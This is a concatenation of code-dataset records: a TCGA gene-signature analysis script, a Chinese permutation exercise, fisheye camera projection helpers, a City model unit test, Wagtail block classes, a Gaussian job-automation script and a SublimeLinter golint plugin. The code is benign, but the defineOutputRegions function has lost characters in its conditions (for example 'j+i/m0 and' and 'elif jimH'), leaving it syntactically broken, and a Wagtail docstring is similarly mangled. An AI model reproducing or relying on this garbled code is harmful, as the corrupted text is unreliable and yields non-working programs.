signature genes are all found in the data\n for k, v in genesets.items():\n for i, t in enumerate(v):\n if t in manual_gene_name_correction:\n v[i] = manual_gene_name_correction[t]\n g_in = rnaseq_dat.index.intersection(v)\n if set(g_in) != set(v):\n missing = set(v).difference(rnaseq_dat.index)\n logger.warn(\n \"%d genes in the %s signature do not match with the data index and will be dropped: %s.\",\n len(missing),\n k,\n ', '.join(missing)\n )\n genesets[k] = g_in\n\n # check here whether there is any overlap\n vs, vc = setops.venn_from_arrays(*genesets.values())\n n_overlap = sum([vc[t] for t in setops.binary_combinations_sum_gte(len(genesets), 2)])\n if n_overlap > 0:\n logger.warn(\n \"The %d gene signatures used here have %d overlapping genes - please check this is OK.\",\n len(genesets),\n n_overlap\n )\n\n # run ssGSEA then Z transform the results\n es = gsva.ssgsea(rnaseq_dat, genesets)\n es_z = z_transform(es, axis=1)\n\n # export\n for_export = es_z.transpose()\n for_export.insert(for_export.shape[1], 'Verhaak classification', rnaseq_meta.loc[for_export.index, 'expression_subclass'])\n for_export.insert(for_export.shape[1], 'Wang classification', rnaseq_meta.loc[for_export.index, 'wang_classification'])\n for_export.to_excel(os.path.join(outdir, \"tcga_signature_scores_and_subgroups.xlsx\"))\n\n # boxplot by subgroup\n if class_method == 'verhaak':\n groups = rnaseq_meta.expression_subclass\n # remove any small groups (e.g. 
a single G-CIMP instance)\n group_list = groups.value_counts()\n group_list = group_list.index[group_list > 2]\n elif class_method == 'wang':\n groups = rnaseq_meta.wang_classification\n if not allow_multiple_classes:\n groups[rnaseq_meta.wang_classification_num_matches != 1] = None\n group_list = groups.dropna().unique()\n else:\n raise NotImplementedError(\"Subgroup type not recognised.\")\n\n groups = groups.fillna('NONE')\n group_list = sorted(group_list)\n\n bplot = {}\n for k in genesets:\n the_data = es_z.loc[k]\n bplot[k] = collections.OrderedDict()\n for sg in group_list:\n bplot[k][sg] = the_data.loc[groups.fillna('').str.contains(sg)].values\n\n lbl, tmp = zip(*bplot[k].items())\n tmp = [list(t) for t in tmp]\n fig = plt.figure(num=k, figsize=(5, 4))\n ax = fig.add_subplot(111)\n sns.boxplot(data=tmp, orient='v', ax=ax, color='0.5')\n ax.set_xticklabels(lbl, rotation=45)\n ax.set_ylabel(\"Normalised ssGSEA score\")\n fig.tight_layout()\n fig.savefig(os.path.join(outdir, '%s_ssgsea_by_subgroup_tcga.png' % k.lower()), dpi=200)\n fig.savefig(os.path.join(outdir, '%s_ssgsea_by_subgroup_tcga.pdf' % k.lower()))\n\n # is the correlation between MG / BMDM and mTOR higher in a given subgroup?\n gs = plt.GridSpec(6, 3)\n fig = plt.figure(figsize=(9, 6))\n # left panel is 2 x 2, comprising all 4 subgroups\n\n dict_mg = scatter_plot_with_linregress(es_z.loc['mTOR'], es_z.loc['MG'], group_list, groups)\n dict_bmdm = scatter_plot_with_linregress(es_z.loc['mTOR'], es_z.loc['BMDM'], group_list, groups)\n\n dict_mg['fig'].savefig(os.path.join(outdir, \"mtor_vs_mg_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_mg['fig'].savefig(os.path.join(outdir, \"mtor_vs_mg_correlation_by_tcga_subgroup.pdf\"))\n\n dict_bmdm['fig'].savefig(os.path.join(outdir, \"mtor_vs_bmdm_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_bmdm['fig'].savefig(os.path.join(outdir, \"mtor_vs_bmdm_correlation_by_tcga_subgroup.pdf\"))\n\n # check for MG / BMDM correlation\n dict_both = scatter_plot_with_linregress(es_z.loc['MG'], es_z.loc['BMDM'], group_list, groups)\n dict_both['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation_by_tcga_subgroup.png\"), dpi=300)\n dict_both['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation_by_tcga_subgroup.pdf\"))\n\n # again but across groups\n dict_both_uniform = scatter_plot_with_linregress(es_z.loc['MG'], es_z.loc['BMDM'])\n dict_both_uniform['fig'].set_size_inches([6, 4])\n dict_both_uniform['fig'].tight_layout()\n dict_both_uniform['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation.png\"), dpi=200)\n dict_both_uniform['fig'].savefig(os.path.join(outdir, \"mg_vs_bmdm_correlation.pdf\"))\n\n # summary plot with all information\n alpha = 0.01\n slope_cmap = plt.get_cmap('RdBu_r')\n slope_norm = common.MidpointNormalize(vmin=-.5, vmax=1.2, midpoint=0.)\n slope_sm = plt.cm.ScalarMappable(cmap=slope_cmap, norm=slope_norm)\n\n group_list_extended = list(group_list) + ['All']\n\n for_plot = collections.OrderedDict([\n # ('MG-BMDM', dict_both),\n ('mTOR-MF', dict_bmdm),\n ('mTOR-MG', dict_mg)\n ])\n\n s, p = get_slope_and_pval(\n for_plot,\n col_order=group_list_extended,\n )\n\n # p_to_size = lambda t: min(150., 45 - 15 * np.log10(t))\n p_to_size = lambda t: min(500., 100 + 10 * np.log10(t) ** 2)\n\n x = range(len(group_list_extended))\n y_fun = lambda t: [t] * len(group_list_extended)\n\n fig, ax = plt.subplots(figsize=(6, 2.4))\n for i, k in enumerate(s.index):\n ax.scatter(\n x,\n y_fun(i),\n color=[slope_sm.to_rgba(t) for t in s.loc[k]],\n s=[p_to_size(t) 
for t in p.loc[k]],\n edgecolor='k',\n linewidth=[.5 if t > alpha else 1.5 for t in p.loc[k]]\n )\n ax.grid('off')\n ax.set_facecolor('w')\n ax.set_xticks(x)\n ax.set_xticklabels(group_list_extended)\n ax.set_yticks(range(p.shape[0]))\n ax.set_yticklabels(p.index)\n ax.set_ylim([-.5, p.shape[0] - 0.5])\n\n slope_sm.set_array(s.values)\n cbar = fig.colorbar(slope_sm)\n cbar.set_label('Slope')\n fig.tight_layout()\n fig.savefig(os.path.join(outdir, \"tcga_correlation_summary.png\"), dpi=200)\n fig.savefig(os.path.join(outdir, \"tcga_correlation_summary.pdf\"))\n\n plt_dict = line_plot_pvalues_slope(p, s, alpha=.05)\n plt_dict['fig'].set_size_inches([6., 2.5])\n plt_dict['gs'].update(bottom=0.23, top=0.9, hspace=0.4, right=0.75)\n plt_dict['fig'].savefig(os.path.join(outdir, \"tcga_correlation_summary_line.png\"), dpi=200)\n plt_dict['fig'].savefig(os.path.join(outdir, \"tcga_correlation_summary_line.pdf\"))","sub_path":"scripts/anaelle/tcga_tam_vs_mtor.py","file_name":"tcga_tam_vs_mtor.py","file_ext":"py","file_size_in_byte":26715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"67217156","text":"\"\"\"\nn个数字的可重复排列\n\n已知n等于4\n\"\"\"\n\n\ndef perm4():\n global count\n i = 4\n for a[i] in range(1, n + 1):\n if i == 4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n pass\n #perm5()\n\n\ndef perm3():\n global count\n i=3\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm4()\n\ndef perm2():\n global count\n i=2\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm3()\n\ndef perm1():\n global count\n i=1\n for a[i] in range(1, n + 1):\n if i==4:\n count += 1\n print(f\"{a[1]},{a[2]},{a[3]},{a[4]}\")\n else:\n perm2()\n\n\nn=4\ncount = 0\na =[0]*5\nperm1()\n\nprint(f\"共{count}种方案\")","sub_path":"AI.by.Search/1-3-4.repear.perm3-4.py1-1-3-4.repear.perm3-4.py","file_name":"1-3-4.repear.perm3-4.py1-1-3-4.repear.perm3-4.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"330464801","text":"import scipy.io as sio\nimport scipy.misc\nimport os\nimport numpy as np\nfrom math import pi, sin, cos, sqrt, atan\nfrom PIL import Image\n\ndef defineOutputRegions(imH,imW,carH,carW):\n output = np.zeros([imH,imW])\n m = (imH - carH) / (imW - carW)\n #top of image\n for i in range(1,int(np.floor((imH-carH)/2)+1)):\n for j in range(1,imW+1):\n if j*m-i>0 and j+i/m0 and j+i/m>=imW:\n output[i-1,j-1] = 2\n else:\n output[i-1,j-1] = 4\n #middle of image\n for i in range(int(np.floor((imH-carH)/2)+1),int(np.floor((imH+carH)/2)+1)):\n for j in range(1,imW+1):\n if j>np.floor((imW+carW)/2):\n output[i-1,j-1] = 2\n elif jimH and j-i/m<(imW-imH/m):\n output[i-1,j-1] = 3\n elif j*m+i>imH and j-i/m>=(imW-imH/m):\n output[i-1,j-1] = 2\n else:\n output[i-1,j-1] = 4\n return output\n\ndef getProjectionMat_vc(vc_params):\n # Virtual camera projection matrix estimation, given extrinsic and intrinsic parameters\n # Virtual camera angles\n thetax = -(pi/180) * vc_params['rotx']\n thetay = -(pi/180) * vc_params['roty']\n thetaz = -(pi/180) * vc_params['rotz']\n\n # Rotation matrix\n Rx = [[1, 0, 0], [0, cos(thetax), -sin(thetax)], [0, sin(thetax), cos(thetax)]]\n Ry = [[cos(thetay), 0, sin(thetay)], [0, 1, 0], [-sin(thetay), 0, cos(thetay)]]\n Rz = [[cos(thetaz), -sin(thetaz), 0], [sin(thetaz), cos(thetaz), 0], [0, 0, 1]]\n\n R = np.dot(np.dot(Rx, Ry), 
Rz)\n\n P = [[R[0, 0], R[0, 1], R[0, 2], 0], [R[1, 0], R[1, 1], R[1, 2], 0], [R[2, 0], R[2, 1], R[2, 2], 0], [0, 0, 0, vc_params['f']]]\n return P\n\n\ndef intrinsic_matrix(camNum, intrinsicParams):\n distortionFocalLength = intrinsicParams['distFocalLength'][camNum]\n distortionCenterX = intrinsicParams['distCenterX'][camNum]\n distortionCenterY = intrinsicParams['distCenterY'][camNum]\n K = [[distortionFocalLength, 0, distortionCenterX], [0, distortionFocalLength, distortionCenterY], [0, 0, 1]]\n return K\n\n\ndef ProjectiveTrans(imgNo, intrinsicParams, extrinsicParams, xw, yw, zw):\n K = intrinsic_matrix(imgNo, intrinsicParams)\n R_w2c = extrinsicParams['R_w2c'][imgNo]\n t_w2c = extrinsicParams['t_w2c'][imgNo]\n P = [[R_w2c[0, 0], R_w2c[0, 1], R_w2c[0, 2], t_w2c[0]], [R_w2c[1, 0], R_w2c[1, 1], R_w2c[1, 2], t_w2c[1]], [R_w2c[2, 0], R_w2c[2,1], R_w2c[2, 2], t_w2c[2]], [0, 0, 0, 1]]\n img_loc = np.dot(P, [xw, yw, zw, 1])\n\n #Normalization\n img_x = img_loc[0]/img_loc[2]\n img_y = img_loc[1]/img_loc[2]\n\n img_loc = np.dot(K, [img_x, img_y, 1])\n\n #Quantization\n img_x = np.round(img_loc[0])\n img_y = np.round(img_loc[1])\n img_loc = [img_x, img_y]\n\n return img_loc\n\n\ndef FisheyeTrans(xin, yin, xc, yc, xd, yd, f):\n #Fisheye distortion correction function\n ru = sqrt(np.power((xin-xc), 2) + np.power((yin-yc), 2))\n rd = 2*f*sin(atan(ru/f)/2)\n xout = (xin-xc)*rd/ru + xd\n yout = (yin-yc)*rd/ru + yd\n img_loc = [xout, yout]\n\n return img_loc\n\n\ndef getTransformedSV_AutoDots(imgNo, img, vc_params, intrinsicParams, extrinsicParams, vis_params):\n # AutoDots is the method of calibration using physical spheres placed in the synthetic scene to compute\n # the perspective transforms into the world coordinate space, which is the image space. This 'AutoDots'\n # method uses image coordinates as the 'world coordinates'\n #\n # The other method uses true world coordinates of the charts, which were also manually selected,\n # to compute the perspective transforms. 
Then there is an additional mapping from world coordinate\n # space into image space.\n\n #unpack visualization parameters\n s = vis_params['scale']\n zwmesh = vis_params['zwmesh']\n imW = vis_params['imW']\n imH = vis_params['imH']\n step_size = vis_params['step_size']\n\n Xc_undist = vis_params['Xc_undist']\n Xc_fish = vis_params['Xc_fish']\n\n vc_proj_mat = getProjectionMat_vc(vc_params) # projection matrix\n fdist = intrinsicParams['distFocalLength'][imgNo]\n xdist = intrinsicParams['distCenterX'][imgNo]\n ydist = intrinsicParams['distCenterY'][imgNo]\n\n pts_fisheye = []\n pts_world = []\n\n outputIm = np.zeros([imH, imW, img.shape[2]],'uint8')\n\n for iIdx in range(imH):\n i = iIdx + 1\n for jIdx in range(imW):\n j = jIdx + 1\n\n xw = j\n yw = i\n zw = zwmesh[iIdx,jIdx]\n\n loc_u = ProjectiveTrans(imgNo, intrinsicParams, extrinsicParams, xw, yw, zw) #loc in undistorted image\n xi = loc_u[0]\n yi = loc_u[1]\n\n loc_d = FisheyeTrans(yi, xi, Xc_undist[0], Xc_undist[1], Xc_fish[0], Xc_fish[1], fdist)\n yi_fish = loc_d[0]\n xi_fish = loc_d[1]\n\n xi_fish = int(np.round(xi_fish))\n yi_fish = int(np.round(yi_fish))\n\n if xi_fish<1:\n xi_fish = 1\n elif xi_fish>img.shape[1]:\n xi_fish = img.shape[1]\n\n if yi_fish<1:\n yi_fish = 1\n elif yi_fish>img.shape[0]:\n yi_fish = img.shape[0]\n\n outputIm[iIdx, jIdx, :] = img[yi_fish-1, xi_fish-1, :]\n\n return outputIm\n\n\ndef combine_seeds(image_dir, image_root, image_suff, num_seeds):\n images = []\n for seed in range(num_seeds):\n image_path = os.path.join(image_dir, image_root + '_s' + str(seed) + image_suff)\n images.append(np.array(Image.open(image_path)))\n\n return np.nanmin(np.asarray(images),0)\n","sub_path":"build_db/preprocess_functions.py","file_name":"preprocess_functions.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"367469272","text":"#!/usr/bin/python3\n\"\"\" This is a test module for City Class\"\"\"\n\n\nfrom models.city import City\nfrom models import city\nimport pep8\nimport unittest\nimport os\n\n\nclass TestCity(unittest.TestCase):\n \"\"\"Class for test the City class\"\"\"\n\n def test_docstring(self):\n \"\"\" Method to test doctring module, class and func \"\"\"\n self.assertTrue(len(city.__doc__) > 0)\n self.assertTrue(len(City.__doc__) > 0)\n for fn in dir(City):\n self.assertTrue(len(fn.__doc__) > 0)\n\n def test_func_docstrings(self):\n \"\"\"Test for the presence of docstrings in BaseModel methods\"\"\"\n for func in dir(City):\n with self.subTest(function=func):\n self.assertIsNot(\n func[1].__doc__,\n None,\n \"{:s} method needs a docstring\".format(func[0])\n )\n self.assertTrue(\n len(func[1].__doc__) > 1,\n \"{:s} method needs a docstring\".format(func[0])\n )\n\n def test_pep8(self):\n \"\"\" Test for pep8 stylecode \"\"\"\n msg = \"Found code style errors (and warning).\"\n style = pep8.StyleGuide(quiet=True)\n file_base = 'models/city.py'\n check = style.check_files([file_base])\n self.assertEqual(check.total_errors, 0, msg)\n\n def test_is_an_instance(self):\n '''check if my_city is an instance of BaseModel'''\n my_city = City()\n self.assertIsInstance(my_city, City)\n\n def test_permissions(self):\n \"\"\" Test for check the permissions \"\"\"\n read = os.access('models/city.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/city.py', os.W_OK)\n self.assertTrue(write)\n exe = os.access('models/city.py', os.X_OK)\n 
self.assertTrue(exe)\n","sub_path":"tests/test_models/test_city.py","file_name":"test_city.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"173763258","text":"import string\n\nfrom django.template.loader import render_to_string\nfrom wagtail.wagtailcore.blocks.list_block import ListBlock\nfrom wagtail.wagtailcore.blocks.static_block import \\\n StaticBlock as WagtailStaticBlock\nfrom wagtail.wagtailcore.blocks.stream_block import \\\n StreamBlock as WagtailStreamBlock\n\n\nclass StreamBlock(WagtailStreamBlock):\n \"\"\"\n Same as the Wagtail StreamBlock with a 'props' key instead of 'value'.\n \"\"\"\n def get_api_representation(self, value, context=None):\n output = super().get_api_representation(value, context=context)\n if output:\n output = [{'type': item['type'], 'props': item['value']} for item in output]\n return output\n\n\nclass StaticBlock(WagtailStaticBlock):\n def value_from_datadict(self, data, files, prefix):\n return self.name\n\n\nclass FixedListBlock(ListBlock):\n \"\"\"\n Same as ListBlock except:\n - it has a fixed number of members (configurable)\n - members cannot be added/removed/ordered\n - members have a label == `
members_label + index letter` ('Area A', 'Area B', ...)\n    \"\"\"\n\n    def render_list_member(self, value, prefix, index, errors=None):\n        \"\"\"\n        Render the HTML for a single list item in the form. This consists of an
  • wrapper, hidden fields\n to manage ID/deleted state, delete/reorder buttons, and the child block's own form HTML.\n \"\"\"\n child = self.child_block.bind(value, prefix=\"%s-value\" % prefix, errors=errors)\n\n return render_to_string('wagtailadmin/block_forms/fixed_list_member.html', {\n 'prefix': prefix,\n 'child': child,\n 'index': index,\n 'label': '{} {}'.format(\n self.meta.members_label,\n string.ascii_uppercase[index or 0]\n )\n })\n\n class Meta:\n members_number = 2\n members_label = 'Area'\n","sub_path":"pages/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"68195799","text":"import os\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.spatial.distance as distance\r\nimport random\r\n\r\nINTERACTION_PATH = os.path.join(os.environ['HOME'],'Working/interaction/')\r\nsys.path.append(INTERACTION_PATH)\r\n\r\nfrom src.make import exec_gjf\r\nfrom src.vdw import vdw_R\r\nfrom src.utils import get_E\r\n\r\ndef init_process(args):\r\n # 数理モデル的に自然な定義の元のparams initリスト: not yet\r\n # 結晶学的に自然なパラメータへ変換: not yet\r\n auto_dir = args.auto_dir\r\n order = 5\r\n monomer_name = args.monomer_name\r\n \r\n os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)\r\n os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)\r\n\r\n def get_init_para_csv(auto_dir,monomer_name):\r\n step1_params_csv = os.path.join(INTERACTION_PATH, '{}/step1/step1_min.csv'.format(monomer_name))\r\n init_params_csv = os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n \r\n init_para_list = []\r\n# A1_list =[0]; A2_list = [1,2,3,4,26,27,28,29,31,32,33,34,36,37,38,39]\r\n A1_list =[-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16,-17,-18,-19,-20]; A2_list = [32]\r\n# A1_list =[0,-5,-10]; A2_list = [0,5,10,15,20,25,30,35,40]\r\n \r\n df_step1 = pd.read_csv(step1_params_csv)\r\n \r\n a_,b_,theta = df_step1.loc[df_step1[\"E\"].idxmin(),[\"a\",\"b\",\"theta\"]].values\r\n step1_para_zip = [[b_,a_,90-theta]]\r\n# print(step1_para_zip)\r\n# d = 5.5\r\n \r\n for a_,b_,theta in step1_para_zip:\r\n print('a,b,theta')\r\n print(a_,b_,theta)\r\n for A1 in tqdm(A1_list):\r\n for A2 in A2_list:\r\n if A1==0 and A2==0:\r\n continue\r\n a = a_# + 4 * d * abs(np.sin(np.radians(A1)))\r\n b = b_/np.cos(np.radians(A2))\r\n init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,'NotYet'])\r\n \r\n df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','status'])\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n get_init_para_csv(auto_dir,monomer_name)\r\n \r\n auto_csv_path = os.path.join(auto_dir,'step2-twist.csv')\r\n if not os.path.exists(auto_csv_path): \r\n df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','E','E_p','E_t','machine_type','status','file_name'])\r\n else:\r\n df_E = pd.read_csv(auto_csv_path)\r\n df_E = df_E[df_E['status']!='InProgress']\r\n df_E.to_csv(auto_csv_path,index=False)\r\n\r\n df_init=pd.read_csv(os.path.join(auto_dir,'step2-twist_init_params.csv'))\r\n df_init['status']='NotYet'\r\n df_init.to_csv(os.path.join(auto_dir,'step2-twist_init_params.csv'),index=False)\r\n\r\ndef main_process(args):\r\n os.chdir(os.path.join(args.auto_dir,'gaussian'))\r\n isOver = False\r\n while not(isOver):\r\n #check\r\n isOver = listen(args)\r\n time.sleep(1)\r\n\r\ndef listen(args):\r\n auto_dir = 
args.auto_dir\r\n monomer_name = args.monomer_name\r\n num_nodes = args.num_nodes\r\n isTest = args.isTest\r\n fixed_param_keys = ['A1','A2']\r\n opt_param_keys = ['a','b','theta']\r\n\r\n auto_csv = os.path.join(auto_dir,'step2-twist.csv')\r\n df_E = pd.read_csv(auto_csv)\r\n df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name']]\r\n machine_type_list = df_queue['machine_type'].values.tolist()\r\n len_queue = len(df_queue)\r\n maxnum_machine2 = 3#num_nodes/2 if num_nodes%2==0 else (num_nodes+1)/2\r\n \r\n for idx,row in zip(df_queue.index,df_queue.values):\r\n machine_type,file_name = row\r\n log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])\r\n if not(os.path.exists(log_filepath)):#logファイルが生成される直前だとまずいので\r\n continue\r\n E_list=get_E(log_filepath)\r\n if len(E_list)!=2:\r\n continue\r\n else:\r\n len_queue-=1;machine_type_list.remove(machine_type)\r\n Et=float(E_list[0]);Ep=float(E_list[1])\r\n E = 4*Et+2*Ep\r\n df_E.loc[idx, ['E_t','E_p','E','status']] = [Et,Ep,E,'Done']\r\n df_E.to_csv(auto_csv,index=False)\r\n break#2つ同時に計算終わったりしたらまずいので一個で切る\r\n isAvailable = len_queue < num_nodes \r\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\r\n machine_type = 1 if machine2IsFull else 2\r\n if isAvailable:\r\n params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys)\r\n if len(params_dict)!=0:#終わりがまだ見えないなら\r\n alreadyCalculated = check_calc_status(auto_dir,params_dict)\r\n if not(alreadyCalculated):\r\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict,'cx':0,'cy':0,'cz':0}, machine_type,isInterlayer=False,isTest=isTest)\r\n df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})\r\n df_E=df_E.append(df_newline,ignore_index=True)\r\n df_E.to_csv(auto_csv,index=False)\r\n \r\n init_params_csv=os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_init_params_done = filter_df(df_init_params,{'status':'Done'})\r\n isOver = True if len(df_init_params_done)==len(df_init_params) else False\r\n return isOver\r\n\r\ndef check_calc_status(auto_dir,params_dict):\r\n df_E= pd.read_csv(os.path.join(auto_dir,'step2-twist.csv'))\r\n if len(df_E)==0:\r\n return False\r\n df_E_filtered = filter_df(df_E, params_dict)\r\n df_E_filtered = df_E_filtered.reset_index(drop=True)\r\n try:\r\n status = get_values_from_df(df_E_filtered,0,'status')\r\n return status=='Done'\r\n except KeyError:\r\n return False\r\n\r\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys):\r\n \"\"\"\r\n 前提:\r\n step2-twist_init_params.csvとstep2-twist.csvがauto_dirの下にある\r\n \"\"\"\r\n init_params_csv=os.path.join(auto_dir, 'step2-twist_init_params.csv')\r\n df_init_params = pd.read_csv(init_params_csv)\r\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step2-twist.csv'))\r\n df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']\r\n \r\n #最初の立ち上がり時\r\n if len(df_init_params_inprogress) < num_nodes:\r\n df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']\r\n for index in df_init_params_notyet.index:\r\n df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n return params_dict\r\n for index in df_init_params.index:\r\n df_init_params = pd.read_csv(init_params_csv)\r\n init_params_dict 
= df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()\r\n fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()\r\n isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict)\r\n if isDone:\r\n # df_init_paramsのstatusをupdate\r\n df_init_params = update_value_in_df(df_init_params,index,'status','Done')\r\n if np.max(df_init_params.index) < index+1:\r\n status = 'Done'\r\n else:\r\n status = get_values_from_df(df_init_params,index+1,'status')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n \r\n if status=='NotYet': \r\n opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)\r\n df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')\r\n df_init_params.to_csv(init_params_csv,index=False)\r\n return {**fixed_params_dict,**opt_params_dict}\r\n else:\r\n continue\r\n\r\n else:\r\n df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})\r\n if len(df_inprogress)>=1:\r\n continue\r\n return {**fixed_params_dict,**opt_params_dict}\r\n return {}\r\n \r\ndef get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict):\r\n df_val = filter_df(df_cur, fixed_params_dict)\r\n a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']\r\n A1 = init_params_dict['A1']; A2 = init_params_dict['A2']\r\n \r\n while True:\r\n E_list=[];heri_list=[]\r\n for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:\r\n for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:\r\n a = np.round(a,1);b = np.round(b,1)\r\n for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:\r\n df_val_ab = df_val[\r\n (df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&\r\n (df_val['A1']==A1)&(df_val['A2']==A2)&\r\n (df_val['status']=='Done')\r\n ]\r\n if len(df_val_ab)==0:\r\n return False,{'a':a,'b':b,'theta':theta}\r\n heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])\r\n a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]\r\n if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:\r\n return True,{'a':a_init,'b':b_init, 'theta':theta_init}\r\n else:\r\n a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init\r\n\r\ndef get_values_from_df(df,index,key):\r\n return df.loc[index,key]\r\n\r\ndef update_value_in_df(df,index,key,value):\r\n df.loc[index,key]=value\r\n return df\r\n\r\ndef filter_df(df, dict_filter):\r\n query = []\r\n for k, v in dict_filter.items():\r\n if type(v)==str:\r\n query.append('{} == \"{}\"'.format(k,v))\r\n else:\r\n query.append('{} == {}'.format(k,v))\r\n df_filtered = df.query(' and '.join(query))\r\n return df_filtered\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument('--init',action='store_true')\r\n parser.add_argument('--isTest',action='store_true')\r\n parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')\r\n parser.add_argument('--monomer-name',type=str,help='monomer name')\r\n parser.add_argument('--num-nodes',type=int,help='num nodes')\r\n \r\n args = parser.parse_args()\r\n\r\n if args.init:\r\n print(\"----initial process----\")\r\n init_process(args)\r\n \r\n print(\"----main process----\")\r\n main_process(args)\r\n print(\"----finish process----\")\r\n 
","sub_path":"src/step2-twist.py","file_name":"step2-twist.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"612836043","text":"#\n# linter.py\n# Linter for SublimeLinter3, a code checking framework for Sublime Text 3\n#\n# Written by Jon Surrell and Jeremy Jay\n# Copyright (c) 2014 Jon Surrell\n#\n# License: MIT\n#\n\n\"\"\"This module exports the Golint plugin class.\"\"\"\n\nfrom SublimeLinter.lint import Linter, util, highlight, persist\nimport os\n\n\nclass Golint(Linter):\n\n \"\"\"Provides an interface to golint.\"\"\"\n\n syntax = ('go', 'gosublime-go')\n cmd = 'golint'\n regex = r'^.+:(?P\\d+):(?P\\d+):\\s+(?P.+)'\n tempfile_suffix = 'go'\n error_stream = util.STREAM_STDOUT\n default_type = highlight.WARNING\n\n def find_gopaths(self):\n \"\"\" search for potential GOPATHs. \"\"\"\n # collect existing Go path info\n goroot = set(os.path.normpath(s) for s in os.environ.get('GOROOT', '').split(os.pathsep))\n gopath = set(os.path.normpath(s) for s in os.environ.get('GOPATH', '').split(os.pathsep))\n if '.' in gopath:\n gopath.remove('.')\n gopath = list(gopath)\n\n # search for potential GOPATHs upstream from filename\n # (reversed to ensure deepest path is first searched)\n dirparts = os.path.dirname(self.filename).split(os.sep)\n for i in range(len(dirparts) - 1, 1, -1):\n if dirparts[i].lower() != \"src\":\n continue\n p = os.path.normpath(os.sep.join(dirparts[:i]))\n if p not in goroot and p not in gopath:\n gopath.append(p)\n\n if persist.debug_mode():\n persist.printf(\"{}: {} {}\".format(self.name,\n os.path.basename(self.filename or ''),\n \"guessed GOPATH=\" + os.pathsep.join(gopath)))\n\n return os.pathsep.join(gopath)\n\n def run(self, cmd, code):\n \"\"\" transparently add potential GOPATHs before running. 
